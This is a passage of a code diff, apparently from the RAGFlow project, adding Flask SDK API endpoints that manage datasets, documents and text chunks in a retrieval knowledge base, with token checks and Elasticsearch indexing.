||||
new_dict = {"similarity_threshold": res["similarity_threshold"],
|
||||
"keywords_similarity_weight": res["vector_similarity_weight"],
|
||||
"top_n": res["top_n"],
|
||||
"rerank_model": res['rerank_id']}
|
||||
res["prompt"].update(new_dict)
|
||||
for key in key_list:
|
||||
del res[key]
|
||||
res["llm"] = res.pop("llm_setting")
|
||||
res["llm"]["model_name"] = res.pop("llm_id")
|
||||
kb_list = []
|
||||
for kb_id in res["kb_ids"]:
|
||||
kb = KnowledgebaseService.query(id=kb_id)
|
||||
kb_list.append(kb[0].to_json())
|
||||
del res["kb_ids"]
|
||||
res["knowledgebases"] = kb_list
|
||||
res["avatar"] = res.pop("icon")
|
||||
list_assts.append(res)
|
||||
return get_json_result(data=list_assts)
|
||||
224
api/apps/sdk/dataset.py
Normal file
224
api/apps/sdk/dataset.py
Normal file
@ -0,0 +1,224 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
from flask import request
|
||||
|
||||
from api.db import StatusEnum, FileSource
|
||||
from api.db.db_models import File
|
||||
from api.db.services.document_service import DocumentService
|
||||
from api.db.services.file2document_service import File2DocumentService
|
||||
from api.db.services.file_service import FileService
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.db.services.user_service import TenantService
|
||||
from api.settings import RetCode
|
||||
from api.utils import get_uuid
|
||||
from api.utils.api_utils import get_json_result, token_required, get_data_error_result
|
||||
|
||||
|
||||
@manager.route('/save', methods=['POST'])
|
||||
@token_required
|
||||
def save(tenant_id):
|
||||
req = request.json
|
||||
e, t = TenantService.get_by_id(tenant_id)
|
||||
if "id" not in req:
|
||||
if "tenant_id" in req or "embedding_model" in req:
|
||||
return get_data_error_result(
|
||||
retmsg="Tenant_id or embedding_model must not be provided")
|
||||
if "name" not in req:
|
||||
return get_data_error_result(
|
||||
retmsg="Name is not empty!")
|
||||
req['id'] = get_uuid()
|
||||
req["name"] = req["name"].strip()
|
||||
if req["name"] == "":
|
||||
return get_data_error_result(
|
||||
retmsg="Name is not empty string!")
|
||||
if KnowledgebaseService.query(name=req["name"], tenant_id=tenant_id, status=StatusEnum.VALID.value):
|
||||
return get_data_error_result(
|
||||
retmsg="Duplicated knowledgebase name in creating dataset.")
|
||||
req["tenant_id"] = req['created_by'] = tenant_id
|
||||
req['embedding_model'] = t.embd_id
|
||||
key_mapping = {
|
||||
"chunk_num": "chunk_count",
|
||||
"doc_num": "document_count",
|
||||
"parser_id": "parse_method",
|
||||
"embd_id": "embedding_model"
|
||||
}
|
||||
mapped_keys = {new_key: req[old_key] for new_key, old_key in key_mapping.items() if old_key in req}
|
||||
req.update(mapped_keys)
|
||||
if not KnowledgebaseService.save(**req):
|
||||
return get_data_error_result(retmsg="Create dataset error.(Database error)")
|
||||
renamed_data = {}
|
||||
e, k = KnowledgebaseService.get_by_id(req["id"])
|
||||
for key, value in k.to_dict().items():
|
||||
new_key = key_mapping.get(key, key)
|
||||
renamed_data[new_key] = value
|
||||
return get_json_result(data=renamed_data)
|
||||
else:
|
||||
invalid_keys = {"embd_id", "chunk_num", "doc_num", "parser_id"}
|
||||
if any(key in req for key in invalid_keys):
|
||||
return get_data_error_result(retmsg="The input parameters are invalid.")
|
||||
|
||||
if "tenant_id" in req:
|
||||
if req["tenant_id"] != tenant_id:
|
||||
return get_data_error_result(
|
||||
retmsg="Can't change tenant_id.")
|
||||
|
||||
if "embedding_model" in req:
|
||||
if req["embedding_model"] != t.embd_id:
|
||||
return get_data_error_result(
|
||||
retmsg="Can't change embedding_model.")
|
||||
req.pop("embedding_model")
|
||||
|
||||
if not KnowledgebaseService.query(
|
||||
created_by=tenant_id, id=req["id"]):
|
||||
return get_json_result(
|
||||
data=False, retmsg='You do not own the dataset.',
|
||||
retcode=RetCode.OPERATING_ERROR)
|
||||
|
||||
if not req["id"]:
|
||||
return get_data_error_result(
|
||||
retmsg="id can not be empty.")
|
||||
e, kb = KnowledgebaseService.get_by_id(req["id"])
|
||||
|
||||
if "chunk_count" in req:
|
||||
if req["chunk_count"] != kb.chunk_num:
|
||||
return get_data_error_result(
|
||||
retmsg="Can't change chunk_count.")
|
||||
req.pop("chunk_count")
|
||||
|
||||
if "document_count" in req:
|
||||
if req['document_count'] != kb.doc_num:
|
||||
return get_data_error_result(
|
||||
retmsg="Can't change document_count.")
|
||||
req.pop("document_count")
|
||||
|
||||
if "parse_method" in req:
|
||||
if kb.chunk_num != 0 and req['parse_method'] != kb.parser_id:
|
||||
return get_data_error_result(
|
||||
retmsg="If chunk count is not 0, parse method is not changable.")
|
||||
req['parser_id'] = req.pop('parse_method')
|
||||
if "name" in req:
|
||||
req["name"] = req["name"].strip()
|
||||
if req["name"].lower() != kb.name.lower() \
|
||||
and len(KnowledgebaseService.query(name=req["name"], tenant_id=tenant_id,
|
||||
status=StatusEnum.VALID.value)) > 0:
|
||||
return get_data_error_result(
|
||||
retmsg="Duplicated knowledgebase name in updating dataset.")
|
||||
|
||||
del req["id"]
|
||||
if not KnowledgebaseService.update_by_id(kb.id, req):
|
||||
return get_data_error_result(retmsg="Update dataset error.(Database error)")
|
||||
return get_json_result(data=True)
|
||||
|
||||
|
||||
@manager.route('/delete', methods=['DELETE'])
|
||||
@token_required
|
||||
def delete(tenant_id):
|
||||
req = request.args
|
||||
if "id" not in req:
|
||||
return get_data_error_result(
|
||||
retmsg="id is required")
|
||||
kbs = KnowledgebaseService.query(
|
||||
created_by=tenant_id, id=req["id"])
|
||||
if not kbs:
|
||||
return get_json_result(
|
||||
data=False, retmsg='You do not own the dataset',
|
||||
retcode=RetCode.OPERATING_ERROR)
|
||||
|
||||
for doc in DocumentService.query(kb_id=req["id"]):
|
||||
if not DocumentService.remove_document(doc, kbs[0].tenant_id):
|
||||
return get_data_error_result(
|
||||
retmsg="Remove document error.(Database error)")
|
||||
f2d = File2DocumentService.get_by_document_id(doc.id)
|
||||
FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == f2d[0].file_id])
|
||||
File2DocumentService.delete_by_document_id(doc.id)
|
||||
|
||||
if not KnowledgebaseService.delete_by_id(req["id"]):
|
||||
return get_data_error_result(
|
||||
retmsg="Delete dataset error.(Database serror)")
|
||||
return get_json_result(data=True)
|
||||
|
||||
|
||||
@manager.route('/list', methods=['GET'])
|
||||
@token_required
|
||||
def list_datasets(tenant_id):
|
||||
page_number = int(request.args.get("page", 1))
|
||||
items_per_page = int(request.args.get("page_size", 1024))
|
||||
orderby = request.args.get("orderby", "create_time")
|
||||
desc = bool(request.args.get("desc", True))
|
||||
tenants = TenantService.get_joined_tenants_by_user_id(tenant_id)
|
||||
kbs = KnowledgebaseService.get_by_tenant_ids(
|
||||
[m["tenant_id"] for m in tenants], tenant_id, page_number, items_per_page, orderby, desc)
|
||||
renamed_list = []
|
||||
for kb in kbs:
|
||||
key_mapping = {
|
||||
"chunk_num": "chunk_count",
|
||||
"doc_num": "document_count",
|
||||
"parser_id": "parse_method",
|
||||
"embd_id": "embedding_model"
|
||||
}
|
||||
renamed_data = {}
|
||||
for key, value in kb.items():
|
||||
new_key = key_mapping.get(key, key)
|
||||
renamed_data[new_key] = value
|
||||
renamed_list.append(renamed_data)
|
||||
return get_json_result(data=renamed_list)
|
||||
|
||||
|
||||
@manager.route('/detail', methods=['GET'])
|
||||
@token_required
|
||||
def detail(tenant_id):
|
||||
req = request.args
|
||||
key_mapping = {
|
||||
"chunk_num": "chunk_count",
|
||||
"doc_num": "document_count",
|
||||
"parser_id": "parse_method",
|
||||
"embd_id": "embedding_model"
|
||||
}
|
||||
renamed_data = {}
|
||||
if "id" in req:
|
||||
id = req["id"]
|
||||
kb = KnowledgebaseService.query(created_by=tenant_id, id=req["id"])
|
||||
if not kb:
|
||||
return get_json_result(
|
||||
data=False, retmsg='You do not own the dataset.',
|
||||
retcode=RetCode.OPERATING_ERROR)
|
||||
if "name" in req:
|
||||
name = req["name"]
|
||||
if kb[0].name != name:
|
||||
return get_json_result(
|
||||
data=False, retmsg='You do not own the dataset.',
|
||||
retcode=RetCode.OPERATING_ERROR)
|
||||
e, k = KnowledgebaseService.get_by_id(id)
|
||||
for key, value in k.to_dict().items():
|
||||
new_key = key_mapping.get(key, key)
|
||||
renamed_data[new_key] = value
|
||||
return get_json_result(data=renamed_data)
|
||||
else:
|
||||
if "name" in req:
|
||||
name = req["name"]
|
||||
e, k = KnowledgebaseService.get_by_name(kb_name=name, tenant_id=tenant_id)
|
||||
if not e:
|
||||
return get_json_result(
|
||||
data=False, retmsg='You do not own the dataset.',
|
||||
retcode=RetCode.OPERATING_ERROR)
|
||||
for key, value in k.to_dict().items():
|
||||
new_key = key_mapping.get(key, key)
|
||||
renamed_data[new_key] = value
|
||||
return get_json_result(data=renamed_data)
|
||||
else:
|
||||
return get_data_error_result(
|
||||
retmsg="At least one of `id` or `name` must be provided.")
|
||||
529
api/apps/sdk/doc.py
Normal file
529
api/apps/sdk/doc.py
Normal file
@ -0,0 +1,529 @@
|
||||
import pathlib
|
||||
import re
|
||||
import datetime
|
||||
import json
|
||||
import traceback
|
||||
|
||||
from flask import request
|
||||
from flask_login import login_required, current_user
|
||||
from elasticsearch_dsl import Q
|
||||
|
||||
from rag.app.qa import rmPrefix, beAdoc
|
||||
from rag.nlp import search, rag_tokenizer, keyword_extraction
|
||||
from rag.utils.es_conn import ELASTICSEARCH
|
||||
from rag.utils import rmSpace
|
||||
from api.db import LLMType, ParserType
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.db.services.llm_service import TenantLLMService
|
||||
from api.db.services.user_service import UserTenantService
|
||||
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
|
||||
from api.db.services.document_service import DocumentService
|
||||
from api.settings import RetCode, retrievaler, kg_retrievaler
|
||||
from api.utils.api_utils import get_json_result
|
||||
import hashlib
|
||||
import re
|
||||
from api.utils.api_utils import get_json_result, token_required, get_data_error_result
|
||||
|
||||
from api.db.db_models import Task, File
|
||||
|
||||
from api.db.services.task_service import TaskService, queue_tasks
|
||||
from api.db.services.user_service import TenantService, UserTenantService
|
||||
|
||||
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
|
||||
|
||||
from api.utils.api_utils import get_json_result
|
||||
|
||||
from functools import partial
|
||||
from io import BytesIO
|
||||
|
||||
from elasticsearch_dsl import Q
|
||||
from flask import request, send_file
|
||||
from flask_login import login_required
|
||||
|
||||
from api.db import FileSource, TaskStatus, FileType
|
||||
from api.db.db_models import File
|
||||
from api.db.services.document_service import DocumentService
|
||||
from api.db.services.file2document_service import File2DocumentService
|
||||
from api.db.services.file_service import FileService
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.settings import RetCode, retrievaler
|
||||
from api.utils.api_utils import construct_json_result, construct_error_response
|
||||
from rag.app import book, laws, manual, naive, one, paper, presentation, qa, resume, table, picture, audio, email
|
||||
from rag.nlp import search
|
||||
from rag.utils import rmSpace
|
||||
from rag.utils.es_conn import ELASTICSEARCH
|
||||
from rag.utils.storage_factory import STORAGE_IMPL
|
||||
|
||||
MAXIMUM_OF_UPLOADING_FILES = 256
|
||||
|
||||
MAXIMUM_OF_UPLOADING_FILES = 256
|
||||
|
||||
|
||||
@manager.route('/dataset/<dataset_id>/documents/upload', methods=['POST'])
|
||||
@token_required
|
||||
def upload(dataset_id, tenant_id):
|
||||
if 'file' not in request.files:
|
||||
return get_json_result(
|
||||
data=False, retmsg='No file part!', retcode=RetCode.ARGUMENT_ERROR)
|
||||
file_objs = request.files.getlist('file')
|
||||
for file_obj in file_objs:
|
||||
if file_obj.filename == '':
|
||||
return get_json_result(
|
||||
data=False, retmsg='No file selected!', retcode=RetCode.ARGUMENT_ERROR)
|
||||
e, kb = KnowledgebaseService.get_by_id(dataset_id)
|
||||
if not e:
|
||||
raise LookupError(f"Can't find the knowledgebase with ID {dataset_id}!")
|
||||
err, _ = FileService.upload_document(kb, file_objs, tenant_id)
|
||||
if err:
|
||||
return get_json_result(
|
||||
data=False, retmsg="\n".join(err), retcode=RetCode.SERVER_ERROR)
|
||||
return get_json_result(data=True)
|
||||
|
||||
|
||||
@manager.route('/infos', methods=['GET'])
|
||||
@token_required
|
||||
def docinfos(tenant_id):
|
||||
req = request.args
|
||||
if "id" in req:
|
||||
doc_id = req["id"]
|
||||
e, doc = DocumentService.get_by_id(doc_id)
|
||||
return get_json_result(data=doc.to_json())
|
||||
if "name" in req:
|
||||
doc_name = req["name"]
|
||||
doc_id = DocumentService.get_doc_id_by_doc_name(doc_name)
|
||||
e, doc = DocumentService.get_by_id(doc_id)
|
||||
return get_json_result(data=doc.to_json())
|
||||
|
||||
|
||||
@manager.route('/save', methods=['POST'])
|
||||
@token_required
|
||||
def save_doc(tenant_id):
|
||||
req = request.json
|
||||
#get doc by id or name
|
||||
doc_id = None
|
||||
if "id" in req:
|
||||
doc_id = req["id"]
|
||||
elif "name" in req:
|
||||
doc_name = req["name"]
|
||||
doc_id = DocumentService.get_doc_id_by_doc_name(doc_name)
|
||||
if not doc_id:
|
||||
return get_json_result(retcode=400, retmsg="Document ID or name is required")
|
||||
e, doc = DocumentService.get_by_id(doc_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
#other value can't be changed
|
||||
if "chunk_num" in req:
|
||||
if req["chunk_num"] != doc.chunk_num:
|
||||
return get_data_error_result(
|
||||
retmsg="Can't change chunk_count.")
|
||||
if "progress" in req:
|
||||
if req['progress'] != doc.progress:
|
||||
return get_data_error_result(
|
||||
retmsg="Can't change progress.")
|
||||
#change name or parse_method
|
||||
if "name" in req and req["name"] != doc.name:
|
||||
try:
|
||||
if pathlib.Path(req["name"].lower()).suffix != pathlib.Path(
|
||||
doc.name.lower()).suffix:
|
||||
return get_json_result(
|
||||
data=False,
|
||||
retmsg="The extension of file can't be changed",
|
||||
retcode=RetCode.ARGUMENT_ERROR)
|
||||
for d in DocumentService.query(name=req["name"], kb_id=doc.kb_id):
|
||||
if d.name == req["name"]:
|
||||
return get_data_error_result(
|
||||
retmsg="Duplicated document name in the same knowledgebase.")
|
||||
|
||||
if not DocumentService.update_by_id(
|
||||
doc_id, {"name": req["name"]}):
|
||||
return get_data_error_result(
|
||||
retmsg="Database error (Document rename)!")
|
||||
|
||||
informs = File2DocumentService.get_by_document_id(doc_id)
|
||||
if informs:
|
||||
e, file = FileService.get_by_id(informs[0].file_id)
|
||||
FileService.update_by_id(file.id, {"name": req["name"]})
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
if "parser_id" in req:
|
||||
try:
|
||||
if doc.parser_id.lower() == req["parser_id"].lower():
|
||||
if "parser_config" in req:
|
||||
if req["parser_config"] == doc.parser_config:
|
||||
return get_json_result(data=True)
|
||||
else:
|
||||
return get_json_result(data=True)
|
||||
|
||||
if doc.type == FileType.VISUAL or re.search(
|
||||
r"\.(ppt|pptx|pages)$", doc.name):
|
||||
return get_data_error_result(retmsg="Not supported yet!")
|
||||
|
||||
e = DocumentService.update_by_id(doc.id,
|
||||
{"parser_id": req["parser_id"], "progress": 0, "progress_msg": "",
|
||||
"run": TaskStatus.UNSTART.value})
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
if "parser_config" in req:
|
||||
DocumentService.update_parser_config(doc.id, req["parser_config"])
|
||||
if doc.token_num > 0:
|
||||
e = DocumentService.increment_chunk_num(doc.id, doc.kb_id, doc.token_num * -1, doc.chunk_num * -1,
|
||||
doc.process_duation * -1)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
tenant_id = DocumentService.get_tenant_id(req["doc_id"])
|
||||
if not tenant_id:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
ELASTICSEARCH.deleteByQuery(
|
||||
Q("match", doc_id=doc.id), idxnm=search.index_name(tenant_id))
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
return get_json_result(data=True)
|
||||
|
||||
|
||||
|
||||
@manager.route('/change_parser', methods=['POST'])
|
||||
@token_required
|
||||
def change_parser(tenant_id):
|
||||
req = request.json
|
||||
try:
|
||||
e, doc = DocumentService.get_by_id(req["doc_id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
if doc.parser_id.lower() == req["parser_id"].lower():
|
||||
if "parser_config" in req:
|
||||
if req["parser_config"] == doc.parser_config:
|
||||
return get_json_result(data=True)
|
||||
else:
|
||||
return get_json_result(data=True)
|
||||
|
||||
if doc.type == FileType.VISUAL or re.search(
|
||||
r"\.(ppt|pptx|pages)$", doc.name):
|
||||
return get_data_error_result(retmsg="Not supported yet!")
|
||||
|
||||
e = DocumentService.update_by_id(doc.id,
|
||||
{"parser_id": req["parser_id"], "progress": 0, "progress_msg": "",
|
||||
"run": TaskStatus.UNSTART.value})
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
if "parser_config" in req:
|
||||
DocumentService.update_parser_config(doc.id, req["parser_config"])
|
||||
if doc.token_num > 0:
|
||||
e = DocumentService.increment_chunk_num(doc.id, doc.kb_id, doc.token_num * -1, doc.chunk_num * -1,
|
||||
doc.process_duation * -1)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
tenant_id = DocumentService.get_tenant_id(req["doc_id"])
|
||||
if not tenant_id:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
ELASTICSEARCH.deleteByQuery(
|
||||
Q("match", doc_id=doc.id), idxnm=search.index_name(tenant_id))
|
||||
|
||||
return get_json_result(data=True)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
@manager.route('/rename', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("doc_id", "name")
|
||||
def rename():
|
||||
req = request.json
|
||||
try:
|
||||
e, doc = DocumentService.get_by_id(req["doc_id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
if pathlib.Path(req["name"].lower()).suffix != pathlib.Path(
|
||||
doc.name.lower()).suffix:
|
||||
return get_json_result(
|
||||
data=False,
|
||||
retmsg="The extension of file can't be changed",
|
||||
retcode=RetCode.ARGUMENT_ERROR)
|
||||
for d in DocumentService.query(name=req["name"], kb_id=doc.kb_id):
|
||||
if d.name == req["name"]:
|
||||
return get_data_error_result(
|
||||
retmsg="Duplicated document name in the same knowledgebase.")
|
||||
|
||||
if not DocumentService.update_by_id(
|
||||
req["doc_id"], {"name": req["name"]}):
|
||||
return get_data_error_result(
|
||||
retmsg="Database error (Document rename)!")
|
||||
|
||||
informs = File2DocumentService.get_by_document_id(req["doc_id"])
|
||||
if informs:
|
||||
e, file = FileService.get_by_id(informs[0].file_id)
|
||||
FileService.update_by_id(file.id, {"name": req["name"]})
|
||||
|
||||
return get_json_result(data=True)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route("/<document_id>", methods=["GET"])
|
||||
@token_required
|
||||
def download_document(dataset_id, document_id):
|
||||
try:
|
||||
# Check whether there is this document
|
||||
exist, document = DocumentService.get_by_id(document_id)
|
||||
if not exist:
|
||||
return construct_json_result(message=f"This document '{document_id}' cannot be found!",
|
||||
code=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
# The process of downloading
|
||||
doc_id, doc_location = File2DocumentService.get_minio_address(doc_id=document_id) # minio address
|
||||
file_stream = STORAGE_IMPL.get(doc_id, doc_location)
|
||||
if not file_stream:
|
||||
return construct_json_result(message="This file is empty.", code=RetCode.DATA_ERROR)
|
||||
|
||||
file = BytesIO(file_stream)
|
||||
|
||||
# Use send_file with a proper filename and MIME type
|
||||
return send_file(
|
||||
file,
|
||||
as_attachment=True,
|
||||
download_name=document.name,
|
||||
mimetype='application/octet-stream' # Set a default MIME type
|
||||
)
|
||||
|
||||
# Error
|
||||
except Exception as e:
|
||||
return construct_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/dataset/<dataset_id>/documents', methods=['GET'])
|
||||
@token_required
|
||||
def list_docs(dataset_id, tenant_id):
|
||||
kb_id = request.args.get("kb_id")
|
||||
if not kb_id:
|
||||
return get_json_result(
|
||||
data=False, retmsg='Lack of "KB ID"', retcode=RetCode.ARGUMENT_ERROR)
|
||||
tenants = UserTenantService.query(user_id=tenant_id)
|
||||
for tenant in tenants:
|
||||
if KnowledgebaseService.query(
|
||||
tenant_id=tenant.tenant_id, id=kb_id):
|
||||
break
|
||||
else:
|
||||
return get_json_result(
|
||||
data=False, retmsg=f'Only owner of knowledgebase authorized for this operation.',
|
||||
retcode=RetCode.OPERATING_ERROR)
|
||||
keywords = request.args.get("keywords", "")
|
||||
|
||||
page_number = int(request.args.get("page", 1))
|
||||
items_per_page = int(request.args.get("page_size", 15))
|
||||
orderby = request.args.get("orderby", "create_time")
|
||||
desc = request.args.get("desc", True)
|
||||
try:
|
||||
docs, tol = DocumentService.get_by_kb_id(
|
||||
kb_id, page_number, items_per_page, orderby, desc, keywords)
|
||||
return get_json_result(data={"total": tol, "docs": docs})
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/delete', methods=['DELETE'])
|
||||
@token_required
|
||||
def rm(tenant_id):
|
||||
req = request.args
|
||||
if "doc_id" not in req:
|
||||
return get_data_error_result(
|
||||
retmsg="doc_id is required")
|
||||
doc_ids = req["doc_id"]
|
||||
if isinstance(doc_ids, str): doc_ids = [doc_ids]
|
||||
root_folder = FileService.get_root_folder(tenant_id)
|
||||
pf_id = root_folder["id"]
|
||||
FileService.init_knowledgebase_docs(pf_id, tenant_id)
|
||||
errors = ""
|
||||
for doc_id in doc_ids:
|
||||
try:
|
||||
e, doc = DocumentService.get_by_id(doc_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
tenant_id = DocumentService.get_tenant_id(doc_id)
|
||||
if not tenant_id:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
|
||||
b, n = File2DocumentService.get_minio_address(doc_id=doc_id)
|
||||
|
||||
if not DocumentService.remove_document(doc, tenant_id):
|
||||
return get_data_error_result(
|
||||
retmsg="Database error (Document removal)!")
|
||||
|
||||
f2d = File2DocumentService.get_by_document_id(doc_id)
|
||||
FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == f2d[0].file_id])
|
||||
File2DocumentService.delete_by_document_id(doc_id)
|
||||
|
||||
STORAGE_IMPL.rm(b, n)
|
||||
except Exception as e:
|
||||
errors += str(e)
|
||||
|
||||
if errors:
|
||||
return get_json_result(data=False, retmsg=errors, retcode=RetCode.SERVER_ERROR)
|
||||
|
||||
return get_json_result(data=True, retmsg="success")
|
||||
|
||||
@manager.route("/<document_id>/status", methods=["GET"])
|
||||
@token_required
|
||||
def show_parsing_status(tenant_id, document_id):
|
||||
try:
|
||||
# valid document
|
||||
exist, _ = DocumentService.get_by_id(document_id)
|
||||
if not exist:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR,
|
||||
message=f"This document: '{document_id}' is not a valid document.")
|
||||
|
||||
_, doc = DocumentService.get_by_id(document_id) # get doc object
|
||||
doc_attributes = doc.to_dict()
|
||||
|
||||
return construct_json_result(
|
||||
data={"progress": doc_attributes["progress"], "status": TaskStatus(doc_attributes["status"]).name},
|
||||
code=RetCode.SUCCESS
|
||||
)
|
||||
except Exception as e:
|
||||
return construct_error_response(e)
|
||||
|
||||
|
||||
|
||||
@manager.route('/run', methods=['POST'])
|
||||
@token_required
|
||||
def run(tenant_id):
|
||||
req = request.json
|
||||
try:
|
||||
for id in req["doc_ids"]:
|
||||
info = {"run": str(req["run"]), "progress": 0}
|
||||
if str(req["run"]) == TaskStatus.RUNNING.value:
|
||||
info["progress_msg"] = ""
|
||||
info["chunk_num"] = 0
|
||||
info["token_num"] = 0
|
||||
DocumentService.update_by_id(id, info)
|
||||
# if str(req["run"]) == TaskStatus.CANCEL.value:
|
||||
tenant_id = DocumentService.get_tenant_id(id)
|
||||
if not tenant_id:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
ELASTICSEARCH.deleteByQuery(
|
||||
Q("match", doc_id=id), idxnm=search.index_name(tenant_id))
|
||||
|
||||
if str(req["run"]) == TaskStatus.RUNNING.value:
|
||||
TaskService.filter_delete([Task.doc_id == id])
|
||||
e, doc = DocumentService.get_by_id(id)
|
||||
doc = doc.to_dict()
|
||||
doc["tenant_id"] = tenant_id
|
||||
bucket, name = File2DocumentService.get_minio_address(doc_id=doc["id"])
|
||||
queue_tasks(doc, bucket, name)
|
||||
|
||||
return get_json_result(data=True)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/chunk/list', methods=['POST'])
|
||||
@token_required
|
||||
@validate_request("doc_id")
|
||||
def list_chunk(tenant_id):
|
||||
req = request.json
|
||||
doc_id = req["doc_id"]
|
||||
page = int(req.get("page", 1))
|
||||
size = int(req.get("size", 30))
|
||||
question = req.get("keywords", "")
|
||||
try:
|
||||
tenant_id = DocumentService.get_tenant_id(req["doc_id"])
|
||||
if not tenant_id:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
e, doc = DocumentService.get_by_id(doc_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
query = {
|
||||
"doc_ids": [doc_id], "page": page, "size": size, "question": question, "sort": True
|
||||
}
|
||||
if "available_int" in req:
|
||||
query["available_int"] = int(req["available_int"])
|
||||
sres = retrievaler.search(query, search.index_name(tenant_id), highlight=True)
|
||||
res = {"total": sres.total, "chunks": [], "doc": doc.to_dict()}
|
||||
for id in sres.ids:
|
||||
d = {
|
||||
"chunk_id": id,
|
||||
"content_with_weight": rmSpace(sres.highlight[id]) if question and id in sres.highlight else sres.field[
|
||||
id].get(
|
||||
"content_with_weight", ""),
|
||||
"doc_id": sres.field[id]["doc_id"],
|
||||
"docnm_kwd": sres.field[id]["docnm_kwd"],
|
||||
"important_kwd": sres.field[id].get("important_kwd", []),
|
||||
"img_id": sres.field[id].get("img_id", ""),
|
||||
"available_int": sres.field[id].get("available_int", 1),
|
||||
"positions": sres.field[id].get("position_int", "").split("\t")
|
||||
}
|
||||
if len(d["positions"]) % 5 == 0:
|
||||
poss = []
|
||||
for i in range(0, len(d["positions"]), 5):
|
||||
poss.append([float(d["positions"][i]), float(d["positions"][i + 1]), float(d["positions"][i + 2]),
|
||||
float(d["positions"][i + 3]), float(d["positions"][i + 4])])
|
||||
d["positions"] = poss
|
||||
res["chunks"].append(d)
|
||||
return get_json_result(data=res)
|
||||
except Exception as e:
|
||||
if str(e).find("not_found") > 0:
|
||||
return get_json_result(data=False, retmsg=f'No chunk found!',
|
||||
retcode=RetCode.DATA_ERROR)
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/chunk/create', methods=['POST'])
|
||||
@token_required
|
||||
@validate_request("doc_id", "content_with_weight")
|
||||
def create(tenant_id):
|
||||
req = request.json
|
||||
md5 = hashlib.md5()
|
||||
md5.update((req["content_with_weight"] + req["doc_id"]).encode("utf-8"))
|
||||
chunck_id = md5.hexdigest()
|
||||
d = {"id": chunck_id, "content_ltks": rag_tokenizer.tokenize(req["content_with_weight"]),
|
||||
"content_with_weight": req["content_with_weight"]}
|
||||
d["content_sm_ltks"] = rag_tokenizer.fine_grained_tokenize(d["content_ltks"])
|
||||
d["important_kwd"] = req.get("important_kwd", [])
|
||||
d["important_tks"] = rag_tokenizer.tokenize(" ".join(req.get("important_kwd", [])))
|
||||
d["create_time"] = str(datetime.datetime.now()).replace("T", " ")[:19]
|
||||
d["create_timestamp_flt"] = datetime.datetime.now().timestamp()
|
||||
|
||||
try:
|
||||
e, doc = DocumentService.get_by_id(req["doc_id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
d["kb_id"] = [doc.kb_id]
|
||||
d["docnm_kwd"] = doc.name
|
||||
d["doc_id"] = doc.id
|
||||
|
||||
tenant_id = DocumentService.get_tenant_id(req["doc_id"])
|
||||
if not tenant_id:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
|
||||
embd_id = DocumentService.get_embd_id(req["doc_id"])
|
||||
embd_mdl = TenantLLMService.model_instance(
|
||||
tenant_id, LLMType.EMBEDDING.value, embd_id)
|
||||
|
||||
v, c = embd_mdl.encode([doc.name, req["content_with_weight"]])
|
||||
v = 0.1 * v[0] + 0.9 * v[1]
|
||||
d["q_%d_vec" % len(v)] = v.tolist()
|
||||
ELASTICSEARCH.upsert([d], search.index_name(tenant_id))
|
||||
|
||||
DocumentService.increment_chunk_num(
|
||||
doc.id, doc.kb_id, c, 1, 0)
|
||||
return get_json_result(data={"chunk": d})
|
||||
# return get_json_result(data={"chunk_id": chunck_id})
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/chunk/rm', methods=['POST'])
|
||||
@token_required
|
||||
@validate_request("chunk_ids", "doc_id")
|
||||
def rm_chunk():
|
||||
req = request.json
|
||||
try:
|
||||
if not ELASTICSEARCH.deleteByQuery(
|
||||
Q("ids", values=req["chunk_ids"]), search.index_name(current_user.id)):
|
||||
